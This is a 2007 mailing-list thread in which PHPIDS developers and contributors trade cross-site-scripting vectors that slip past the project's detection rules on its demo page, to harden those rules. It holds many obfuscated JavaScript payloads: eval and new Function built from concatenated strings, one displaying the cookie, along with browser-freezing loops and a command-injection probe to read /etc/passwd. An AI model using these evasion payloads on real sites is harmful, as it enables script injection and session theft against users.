After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time with the rules and except from some details we are pretty content
with them.
So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).
Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+
Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of what form ever can be
provided. A similar contest will follow the next weeks for SQL
Injection.
Greetings and have fun!
.mario
http://hackademix.net/2007/09/04/phpids-threesome/
Told you string concatenation was tough :)
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
URL=name
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
It should work cause I tested it locally however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
cause the onclick handler to produce invalid data. The code above get
pass your filters though,
Tested this is Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':
0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>
On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
I think I might have found 1 vector already
On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Yep - very nice and strange one indeed! But fixed. The concatenation
> algorithm has received a recode - hope that will stop the next wave ;)
>
> Greetings and thanks!
> .mario
>
> 2007/9/6, Gareth <gazhe...@gmail.com>:
I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.
On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is need is because of the amount of possible
combinations and having a automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in you see.
Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip
On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
<script type="text/javascript">window.name=''</script>
Which the PHPIDS could include in the header of the page.
Mario: do you prefer these posted here or at sla.ckers or both?
On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>
> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...
>
> > On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > >http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...
>
> --
> _______________________
> php-ids.org
A redirect to google.
If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediatly closes (close()).
The following two lock up the browser with 100% CPU activity.
http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D
This is a opera specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);
On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?
Needless to say that the rules are *fixed* ;)
Thanks man!
.mario
On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>
> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> the site opens and immediatly closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>
On Aug 28, 3:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
Muhahahahahaha
On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)
xorrer
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
>
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>
Dr Evil strikes again muwhahaahaha
I tried to create the smallest possible vector to see if it was
possible, this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.
On Sep 11, 12:33 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Thanks xorrer!
>
> @Gareth: This one is evil. damn!
>
> 2007/9/11, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
> > On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
> > wrote:
> > > Nice stuff - I didn't know about the opera specific JS - is there a
> > > link to inform about that stuff?
>
> > Well the only real source I know of is here
> >http://www.howtocreate.co.uk/operaStuff/operaObject.html.
> > And a file once included with earlier opera versions jsconsole.html
> > (http://people.opera.com/byberg/jsconsole.html,
> >http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole...
It's unbelievable that javascript allows variables to be called just
'_' don't you think lol
I always say building things is a lot harder than breaking them ;)
On Sep 11, 12:59 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> That's indeed DrEvilish - damn - this is working in dozens of
> combinations...
>
> _=alert, 'a',1;_(1);
>
> _=alert,
> 1,1;_(1);
>
> _=alert, 1,
> 1
> _(1);
>
> _=alert, 'a',1 , _ (1);
>
> Man - it's going to be really hard to find a pattern.
>
> 2007/9/11, Gareth <gazhe...@gmail.com>:
Also... I would like to test some of the path traversal injections but
am not for sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
passwd in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...
On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
> I like how the error page shows the vector in an input box now... but
> could you make it a bit wider?
>
> Also... I would like to test some of the path traversal injections but
> am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwill display /etc/
On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...
>
> On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
>
> > I like how the error page shows the vector in an input box now... but
> > could you make it a bit wider?
>
> > Also... I would like to test some of the path traversal injections but
> > am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwilldisplay /etc/
see http://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
for an explanation.
On Sep 10, 10:03 am, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>
> 2007/9/10, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>
> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...
On Sep 14, 4:39 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> This is plain awesome - already commented on that one on slackers. Thanks,
> thornmaker!!!
>
> 2007/9/14, thornmaker <thornma...@gmail.com>:
>
>
>
>
>
> >http://demo.php-ids.org/?test=%7B%7A%3D%28%31%3D%3D%34%29%3F%68%65%72...
>
> > seehttp://sla.ckers.org/forum/read.php?12,8085,15889,page=7#msg-15889
On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hehe - you managed to catch a 15 second window when i uploaded a faulty file
> ;)
>
> 2007/9/15, thornmaker <thornma...@gmail.com>:
Just some other stuff, again tested on Opera. Nothing special just
something to mess up the page a little.
http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F%64%65%28%74%72%75%65%29%3B
Btw. the last injections from thornmaker and kishord and the first of
mine above didn't execute on opera only in firefox.
Xorrer
On Sep 15, 6:00 am, thornmaker <thornma...@gmail.com> wrote:
> a ternary operator based injection:http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F...
Xorrer
On Sep 15, 10:19 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> Displays cookie and the string XSS (based on thornmakers and kishords
> work. thanks for the x='eval';n=0.[x] trick)
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> Just some other stuff, again tested on Opera. Nothing special just
> something to mess up the page a little.
>
> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F...
On Sep 15, 12:15 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Nice one, xorrer! Your first ones i fixed on accident while working on
> thornmakers and kishors examples but the second one came unexpected ;) I did
> a slight modification on the converter to fix it. Thx!
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > Basic concept still works.
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
Thanks. You can just list me up as xorrer, no webpage to link to.
On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...
On Sep 15, 6:10 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Argh - one second after the release ;)
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > oh... and btw it still works. and this time i took the time to clean
> > up the vector a little
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
On Sep 15, 12:53 pm, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> Well - this issue seems to be way harder to solve than i originally thought.
>
> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
> > Still works along the same lines
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...
> --
> _______________________
> php-ids.org
Those ternary ones are though to prevent
I have a vector which fails by just one character. But I would like to
share it anyway.
If you remove the closing bracket. It passes the IDS, but then the
eval won't work.
And with my setup there is no way to escape this regex _START_,.+=.+
(\?|,).*\)_END_ or am I wrong?
On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!
> here's another ternary one to add to the mix:http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...
On Sep 15, 11:31 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Good stuff thornmaker.
>
> Those ternary ones are though to prevent
>
> I have a vector which fails by just one character. But I would like to
> share it anyway.
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B...
On Sep 16, 2:44 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> here are two other vectors.
>
> http://demo.php-ids.org/?test=%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%27...
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62...
<code>asd</code>
On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
Copy/Paste the vector from here http://phpfi.com/263258
On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
That wasn't actually a vector only a test if the <code> tag can be
used in postings. Man this post was only up 2 seconds how did u manage
to catch it
> --
> _______________________
> php-ids.org
Those vectors are really great xorrer - many many thanks!
Martin
a = eval;a(test);
scores nothing and performs an eval on test...
a=eval;a(test);
(without the spaces) scores an impact of 5.
Might want to fix the rule so that spaces are included and raise the
same impact...
M
> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62 .
> > > > > > ..
> > > > >
Btw:
function x () { alert(1) }; x();
Can't believe that isn't detected!
Have fun!
M
On Sep 16, 8:39 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Yep - rules were temporarily not at full strength, sry.
>
> in Hinks <mhi...@gmail.com>:
>
>
>
>
>
> > Damn - must have caught you between rule changes - knew it was too easy :p
>
> > M
>
> > On 9/16/07, Martin Hinks <mhi...@gmail.com> wrote:
> > > Ok... well, something to think about!
>
> > > Btw:
>
> > > function x () { alert(1) }; x();
>
> > > Can't believe that isn't detected!
>
> > > Have fun!
>
> > > M
>
> > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com> wrote:
> > > > @Martin: Thanks - but I know. If I'd fix that we'd generate tons of
> > false
> > > > alerts. I've been struggling with the JS property rules for some time
> > (the
> > > > ones starting with (?:[^$\w\/-\s](?: ).
>
> > > > Maybe they will be removed soon but there's lots of testing needed
> > before...
>
> > > > 2007/9/16, Martin Hinks <mhi...@gmail.com>:
>
> > > > > Hey Mario, something I just noticed:
>
> > > > > a = eval;a(test);
>
> > > > > scores nothing and performs an eval on test...
>
> > > > > a=eval;a(test);
>
> > > > > (without the spaces) scores an impact of 5.
>
> > > > > Might want to fix the rule so that spaces are included and raise the
> > > > > same impact...
>
> > > > > M
>
> > > > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com> wrote:
> > > > > > Yep - they are and they are furthermore really helpful to point
> > out bugs
> > > > in
> > > > > > the rules. The last examples used the fact that you can use $ as
> > label
> > > > in JS
> > > > > > (we had that earlier) which i plain forgot in several rules.
>
> > > > > > Awesome stuff!
>
> > > > > > 2007/9/16, Martin Hinks < mhi...@gmail.com>:
>
> > > > > > > Mario > *
>
> > > > > > > Those vectors are really great xorrer - many many thanks!
>
> > > > > > > Martin
>
> > > > > > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com>
> > wrote:
> > > > > > > > Actually I'm a bot. *kidding*
> > > > > > > > No - just a coincidence :)
>
> > > > > > > > 2007/9/16, xorrer <obhvsbypqg...@gmail.com>:
> ...
>
> read more »
b = (x());
$ = .0[b];a=$;
a( h() );
function x () { return 'eva' + p(); };
function p() { return 'l' ; };
function h() { return 'aler' + i(); };
function i() { return 't (123456)' ; };
Enjoy ;)
M
If we have functions such as eval, decodeURIComponent, replace or
String.fromCharCode, we can do pretty much what we want, I guess.
Anyway, nothing of this really has todo with intrusion detection. Its
just circumventing a blacklist filter and hope that the browser
executes it.
I'll leave that for tomorrow.
- christ1an
am Sonntag, 16. September 2007 um 21:56 schrieben Sie:
(?:[":;,]\s*[)}\]]+)
finds closing JavaScript breaker including whitespace attacks
however they do not visually appear to match this rule. For
example...
a='';b
gets through fine, but
a='';b=
gets blocked by this rule... which just doesn't seem right.
perhaps I am too tired to be thinking clearly... I'll look again in
the morning.
Yep, that unicode stuff I stumpled upon yesterday with variable names
like 'ä', will cause some problems.
> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it.
I don't really understand this statement. So you don't consider XSS
attacks to be something which PHPIDS should detect. Then what is an
IDS for a wepapp supposed to find, if XSS doesn't fall into ID?
On Sep 17, 1:27 am, christ1an <ch0...@googlemail.com> wrote:
> Actually we can inject arbitrary js code at the moment since we can
> bake all js functions and every single char using this kind of vector:
>
> http://phpfi.com/263306
>
> If we have functions such as eval, decodeURIComponent, replace or
> String.fromCharCode, we can do pretty much what we want, I guess.
>
> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it.
>
> I'll leave that for tomorrow.
>
> - christ1an
>
> am Sonntag, 16. September 2007 um 21:56 schrieben Sie:
>
>
>
> > Ok, got one for real now :p
> > b = (x());
> > $ = .0[b];a=$;
> > a( h() );
> > function x () { return 'eva' + p(); };
> > function p() { return 'l' ; };
> > function h() { return 'aler' + i(); };
> > function i() { return 't (123456)' ; };
> > Enjoy ;)
> > M
> > On 9/16/07, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> >> Same stuff.
>
> >>http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%3F%27%27%3A+0%3Bb...
> ...
>
> read more
I think it this thread is very important either for the PHPIDS and for
the readers. Personally speaking I haven't learned that much about XSS
and JS in general since a very long time. Starting with the XML
predicates, Unicode labels, the weirdest concatenations, anonymous
methods put together in ways one would never expect them to execute
and so on. (we should assemble a paper about that!!!)
The filter rules before starting this thread had a size of 26372 bytes
and detected none of the listed vectors - now the have a size of 24259
bytes and are able to detect any of the listed ones. Sure - after this
storm has slowed down there will be much work to fix false positives -
in fact I fixed several ones yesterday evening - but that is plainly
the evolution the PHPIDS has to go through.
In my eyes any new submission is greatly appreciated and very much
helps the system in getting better. What do you think?
> ...
>
> Erfahren Sie mehr
Martin
On Sep 17, 10:10 am, "Mario Heiderich"
<mario.heider...@googlemail.com> wrote:
> 100% agreement with martin!
>
> Ah and btw: I added a new feature to the converter - small but maybe with
> strange results - so please excuse if the demo rules _might_ act a little
> bit weird. I am still testing... :)
>
> 2007/9/17, Martin Hinks <mhi...@gmail.com>:
>
>
>
>
>
> > This process is absolutely crucial for the IDS! It is only through the
> > expert knowledge and time donated of people who really know what they
> > are doing when it comes to attacks that the blacklist-system can ever
> > be effective. Sure, there will always be new vectors, but this process
> > is the core of PHPIDS. Without excellent filter rules it's just a
> > glorified regex matching engine.
>
> > Martin
>
> ...
>
> read more
Thanks xorrer!
M
On Sep 17, 10:57 am, "Martin Hinks" <mhi...@gmail.com> wrote:
> Awesome use of the XML predicates!
>
> Thanks xorrer!
>
> M
>
> On 9/17/07, xorrer <obhvsbypqg...@gmail.com> wrote:
>
>
>
>
>
> > I worked out thishttp://groups.google.com/group/php-ids/msg/f1706c3ff2eeaf98
> > idea from Gareth.
>
> >http://demo.php-ids.org/?test=s1%3D%3Cs%3Eevalalerta%281%29a%3C%2Fs%3...
> ...
>
> read more
Btw. I found this one
http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%C3%A4%281%29+%C2%BC%2Fscript%C2%BE.
But don't really know if it would work if the circumstances where
right (The US-ASCII problem, found by Kurt Huwig)
And there seems to be a problem with the acute accent "´". After
sending just that character in the answer it says
[codesnippet]<h3>found injection: ´</h3>[/codesnippet]
> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:
> ...
>
> read more
But the second one wasn't about detecting the acute accent, which is
correct but the answer from PHPIDS.
Which includes ´, where does this  come from.
That's what I meant
On Sep 17, 5:27 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hi xorrer!
>
> We once had a rule for that one but to be honest I didn't ever manage to get
> this one running. So i think this is ignorable. What do you think?
>
> The accent/backtick is being detected when coming alone as SQL injection
> because it's a _very_ common pattern to just inject a quoting char. So I
> decided to add this pattern to the rules - It shouldn't create many false
> positives so I think we should keep it in.
>
> Greetings,
> .mario
>
> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
> > Ok christ1an, now I understand what you meant. And I agree that the
> > PHPIDS probably already detects most of the attacks that matter for
> > real world applications.
>
> > Btw. I found this one
>
> >http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%...
> ...
>
> read more
Here an attribute breaking injection. Which also heavily messes up the
page for fun.
On Sep 17, 5:41 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Ah now I get it. That should be some encoding issue on certain OS. The out
> is validated several times so some special chars may produce weird output
> like
> found injection: ´This is a demo-only issue and has nothing to with the
> PHPIDS. Btw - above is my output on Ubuntu 7.1 - on the WinXP VMs it looks
> completely different.
>
> Grx,
> .mario
>
> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:
> ...
>
> read more
Nevertheless here's the copy of what i posted on slackers recently to
make some things more clear:
<copy&paste>
I'm a bit frightened by the suddenly changed atmosphere. To avoid
misunderstanding and to express my absolutely personal opinion here's
my 2 cent (as initial founder and maintainer of the rules):
- I love waking up in the morning and seeing new injection vectors
after checking my mails - the weirder the better
- I love fixing them ASAP - some fixes are better - some worse - but
all in all it so much helps to increase the quality of the product
that is called PHPIDS. The fast release cycles makes the PHPIDS better
than the commercial solutions because we can react on new exploit
vectors in half an hour.
- The maybe stupid sounding slogan 'Web Application Security 2.0' is
more than a slogan - it's what the project is all around - it's
knowledge of an unlimited amount of people brought together in one
open tool. We didn't chose the LGPL on random but on purpose. Need the
rules to improve your project? Take em!
- And last but not least - the project will never be perfect and there
will always be an attack surface. But we are altogether working on the
fact that the attack surface is becoming smaller and smaller every
day.
Please continue submitting your vectors and helping us out - I try to
provide giving credit as much as my time allows and I hope you are
cool with that way. If not just drop me us a line. Any input
whatsoever is very much appreciated and w/o your help the project
would be nothing.
Thanks for all of you recent work - please give us more reasons to
dream of weird javascript madness (the sqli contest is already
waiting) :)!!
.mario
</copy&paste>
On Sep 17, 6:27 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Ah, ok.
>
> http://demo.php-ids.org/?test=a%3C%2Ftd%3E%C3%A4%3C%2Ftr%3E%C3%A4%3C%...
> ...
>
> read more
On Sep 17, 10:30 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:
> ...
>
> read more »
and here's my first one using the xml tags... and also the shortest
one i've found in a long time.
a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))
On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
> @xorrer : i just learned from your vector that a reg exp can be used
> as the boolean with the ternary operator... that's cool!
> @gareth : good stuff there... and here i thought 'function' was
> filtered, but never even tried it
> @.mario :http://xkcd.com/208/ - did i show you this comic already? i
> have a bad memory for stuff like that... anyhow... everytime i think
> of you fixing the filters, this comic comes to mind.
>
> and here's my first one using the xml tags... and also the shortest
> one i've found in a long time.
>
> http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65...
On Sep 18, 6:10 am, Gareth <gazhe...@gmail.com> wrote:
> s=function test2() {return 'aalert(1)a';1,1}();
> void(a = {} );
> a.a1=function xyz() {return s[1] }();
> a.a2=function xyz() {return s[2] }();
> a.a3=function xyz() {return s[3] }();
> a.a4=function xyz() {return s[4] }();
> a.a5=function xyz() {return s[5] }();
> a.a6=function xyz() {return s[6] }();
> a.a7=function xyz() {return s[7] }();
> a.a8=function xyz() {return s[8] }();
> $=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
> +a.a8 }();
> new Function($)();
>
> On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
>
> > @xorrer : i just learned from your vector that a reg exp can be used
> > as the boolean with the ternary operator... that's cool!
> > @gareth : good stuff there... and here i thought 'function' was
> > filtered, but never even tried it
> > @.mario :http://xkcd.com/208/- did i show you this comic already? i
On Sep 18, 9:19 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:
> Hi!
>
> Nice ones again! I am still struggling with the last xml predicate vector
> and think about adding an own rule to detect those kinds of attacks. The
> other ones are fixed...
>
> @thornmaker: yep - knew the comic. Unfortunately no lianas in our office ;)
>
> 2007/9/18, Gareth <gazhe...@gmail.com>:
>
>
>
>
>
> > x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()
>
> > On Sep 18, 6:10 am, Gareth <gazhe...@gmail.com> wrote:
> > > s=function test2() {return 'aalert(1)a';1,1}();
> > > void(a = {} );
> > > a.a1=function xyz() {return s[1] }();
> > > a.a2=function xyz() {return s[2] }();
> > > a.a3=function xyz() {return s[3] }();
> > > a.a4=function xyz() {return s[4] }();
> > > a.a5=function xyz() {return s[5] }();
> > > a.a6=function xyz() {return s[6] }();
> > > a.a7=function xyz() {return s[7] }();
> > > a.a8=function xyz() {return s[8] }();
> > > $=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
> > > +a.a8 }();
> > > new Function($)();
>
> > > On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
>
> > > > @xorrer : i just learned from your vector that a reg exp can be used
> > > > as the boolean with the ternary operator... that's cool!
> > > > @gareth : good stuff there... and here i thought 'function' was
> > > > filtered, but never even tried it
> > > > @.mario :http://xkcd.com/208/-did i show you this comic already? i
Btw. are you already considering adding support for some of the new
js-functionalities in firefox 3 where something like this
http://demo.php-ids.org/?test=function+%C3%B6%28h%29+%27evlar%28tXS%29%27%5Bh%5D%3B%0D%0A%C3%A4.a+%3D+%C3%B6%281%29%2C
would work (not a complete example, just to show of the new lambda
notaion).